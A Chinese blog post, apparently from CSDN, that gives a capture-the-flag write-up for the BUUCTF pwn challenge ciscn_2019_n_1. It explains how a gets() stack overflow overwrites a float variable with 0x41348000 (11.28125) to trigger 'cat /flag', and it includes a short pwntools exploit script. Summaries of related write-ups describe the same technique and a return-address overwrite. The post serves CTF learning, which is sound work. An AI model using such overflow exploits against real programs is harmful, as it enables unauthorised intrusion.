buu ciscn_2019_n_1

最新推荐文章于 2024-07-04 23:57:36 发布

白塔河冲浪手

最新推荐文章于 2024-07-04 23:57:36 发布

阅读量116

点赞数

文章标签： python 经验分享系统安全

本文链接：https://blog.csdn.net/m0_63253040/article/details/126807578

版权

地址覆盖

当v2为11.28125时执行cat /flag，所以我们令v1覆盖v2的地址使其为11.28125

溢出距离为0x30-0x4

11.28125的十六进制为0x41348000

exp:

from pwn import *

host = 'node4.buuoj.cn'
port = 26014
p= connect (host,port)

#p= process('./pwn1')

payload= b'a'*(0x30-0x4)+p64(0x41348000)
p.send(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

白塔河冲浪手

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
buu ciscn_2019_n_1

当v2为11.28125时执行cat /flag，所以我们令v1覆盖v2的地址使其为11.28125。11.28125的十六进制为0x41348000。溢出距离为0x30-0x4。
复制链接

扫一扫

BUU ciscn_2019_n_1

xieyichensss的博客

03-19

399

**BUUOJ ciscn_2019_n_1** （今天来晚了，嘿嘿，出去唱歌了，被淋成落汤鸡） 1.老规矩，将其checksec和file一下，发现NX保护被打开了，且是64为的ELF文件。 2.那就放入IDA64内分析，按fn+F5查看c的代码，发现一个func（）的函数，双击进入 cat flag直接映入眼帘，我tm直接暗喜，有后门函数了诶，那就不慌了，直接看c的代码。 3.要想将后门函数覆盖到返回地址，那就必须要v2=11.28125，可是又没有v2的gets函数，我们...

BUU-ciscn_2019_n_1

qq_45771413的博客

04-27

215

检查保护 IDA 函数主体很简单：初始化v2为0.0 ；输入数字存进v1，然后让v2和11.28125进行对比，相同则自动 cat flag 解题 gets函数明晃晃地摆在主函数里，准备对v1动手。可以看到v1长度 0x30，下面v2的长度为 0x4 进去瞅瞅：v1和v2紧挨着，而且v1覆盖v2的空间那exp思路就很清晰了，把v1到v2首地址之间的空间都填满，然后填进值11.28125，这样就能覆盖v2初始化的0.0 从而满足条件跳转猫flag。 Tips：关于11.28125的输入：浮点输入

参与评论您还未登录，请先登录后发表或查看评论

【BUUCTF-PWN】4-ciscn_2019_n_1

最新发布

燕麦葡萄干的博客

07-04

366

这里为了堆栈平衡+1反而没办法打通，不+1反而可以成功，因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2，然后给v2 11.28125的值。查看变量在栈中的位置：v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位，开启了NX保护。这里再试验第二种思路，溢出到变量2。后门函数的地址是0x4006BE。

[BUUCTF-pwn]——ciscn_2019_n_1

Y_peak的博客

01-31

1004

[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址题目地址：https://buuoj.cn/challenges#ciscn_2019_n_1 题目：老规矩下载下来后，在Linux上checksec一下，64位，并且没有开启栈保护，意味着我们可以利用栈溢出在IDA中看一下，main函数里面没有什么可以利用的双击func函数看看，就是我们想要的。思路一 —— 覆盖局部变量

【BUUCTF - PWN】ciscn_2019_n_1

古月浪子的博客

03-19

3575

checksec一下 IDA打开，发现如果满足的条件达成，就能get flag 找到栈溢出漏洞，输入可以覆盖到v2 写代码把11.28125在内存中的十六进制表示出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ...

buuoj ciscn_2019_n_1 writeup

m0_73605862的博客

05-30

113

Step4：查看函数，发现有一个gets（）函数，栈的大小只有44，但是v1，点进去查看有0x30-0x4，又因为当v2=11.28125会有cat flag这个后门，所以只要让v1栈溢出可以使v2的值改变。Step3：看到main函数，查看伪代码（F5，如果键被占用，Fn+F5），然后发现有一个函数叫做func（），进入这个函数。【来源】（buuoj）https://buuoj.cn/challenges#ciscn_2019_n_1。【题目】ciscn_2019_n_1。

cipher_CIPHER_

09-29

1. **Cipher功能介绍**：解释芯片内置的加密引擎如何工作，支持哪些加密标准和模式，如ECB、CBC、CFB、OFB、CTR等。 2. **API接口**：列出与Cipher相关的软件接口，包括初始化、设置密钥、加密/解密数据及清理资源...

thuong_mai_dien_tu_magento

03-05

Docker Magento 2.4.X开源（CE）02-2021 用于Magento 2.4.x开发的Docker容器，包括： ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ ... docker exec -i -t --user magento magento2_php-apache_1 insta

POSN:POSN-BUU的源代码

04-01

POSN-BUU可能是该系统的一个特定实现或者模块，主要用于处理BUU（Base Unit Unit，基本单元）相关的定位任务。这个源代码是用C++编程语言编写的，C++是一种通用且高效的编程语言，特别适合开发对性能要求高的系统...

apachecn#apachecn-ctf-wiki#[WP／BUU／CTF]Cookie-Store-题解_車鈊的博客-CSD

07-25

来源：，涉及Cookie的使用方法操作方

BUU 论坛的编辑器163Editor

09-21

"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具，它可能集成了丰富的富文本编辑功能，让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素，提升交互体验。"DianUbb.rar"是这个...

BUUCTF ciscn_2019_n_1

RookieMOR的博客

05-14

642

1.下载文件，用checksec一下： 2.用IDA64查看，进入func函数：当v2=11.28125时获得flag，但只有v1的输入，没有v2输入。因为有一个gets函数，点击v1，v2可以知道，v1与v2差44个字节，可以通过输入v1的值去改变v2的值，实现栈溢出。查看汇编可以看到有一个uconiss的比较指令，把xmm0与cs:dword_4007F4，由movss可以知道xmme0是v1或v2的值，那么点击dword_4007F4 看到一个 dd ，百度一下可以知道，.

初学pwn-BUUCTF(ciscn_2019_n_1)

天柱的博客

08-31

625

初学pwn-writeUp BUUCTF的第四道题，ciscn-2019_n_1。首先还是链接远端查看一下。这里提示让猜一个数字，然后他告诉我们，这个数字应该是11.28125。这就有点掩耳盗铃了呀，但是输入了11.28125，还是在说应该输入11.28125。可能是有点问题，ida打开查看一下。可以看到主函数里，调用了三个函数，前两个都是set某个值，我们直接看func函数。那这就很明显了，刚刚输入的值赋给了v1，但是这里是要让v2的值等于11.28125才可以。查看一下地址。嗯，跟想象

以题目：ciscn_2019_n_1来详细学习dbg和pwntools

WdIg-2023的博客

01-21

1146

我们在做Linux平台下的pwn题目的时候，调试是必不可少的一步，在调试的过程中找到漏洞并用pwntools写出攻击脚本。

BUUCTF—ciscn_2019_n_1 1

qq_41560595的博客

09-24

4350

这道题是栈溢出题型，又不同于一般的栈溢出，在此做个总结。查看权限拖入IDA，F5可用函数解题思路：这道题的意思是输入字符串v1，判断v2。考虑输入长字符串覆盖到存储v2的内存空间，把v2的值改掉。因此，覆盖0x30-0x4=44个字节给v1，另外4个字节给v2 由于v2数值在内存中以16进制存储，所以，找到11.28125的16进制值。存在两个比较指令，双击进去。 0x41348000就是16进制的11.28125。编写脚本 from pwn import * p=remote('

[BUUCTF]PWN5——ciscn_2019_n_1

mcmuyanga的博客

08-25

1668

[BUUCTF]4——ciscn_2019_n_1 题目网址：https://buuoj.cn/challenges#ciscn_2019_n_1 步骤：例行检查，64位，开启了nx保护 nc一下看看输入点的字符串，看运行结果猜测是一个猜数的程序，而且需要我们猜的数应该是11.28125 输入11.28125，发现还是不对用64位ida打开，首先shift+f12查看程序里的字符串，发现了 “ cat /flag ” 双击跟进，ctrl+x找到调用这个字符串的函数我们可以看到第10行的if

BUUCTF pwn ciscn_2019_n_8

菜的只能随便写写博客

02-03

2616

0x01 文件分析文件很简单，32位，保护都开得差不多。 0x02 运行输入并且回显。 0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...

BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)

菜的只能随便写写博客

11-26

5865

由于Ubuntu18的环境很迷，这个题目只在kali上用本地libc完成过，脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE 0x02 流程分析根据运行的流程，这个程序主要有两个功能，加密功能可以使用，但解密功能没办法使用，并且能够输入的地方就两个，一个选择程序，数字输入，第二个输入加密文本，字符串类型，之后的静态分析主要关注这两个地方。 0x02...

BUU BRUTE 1 1

09-18

BUU BRUTE 1是一个爆破任务，根据引用所述，首先尝试爆破用户名，可以选择一个适合的字典进行爆破。接着，根据引用所述，可以切换到密码爆破模式，使用适当的字典或数字列表进行爆破。最后，根据引用所述，通过查看...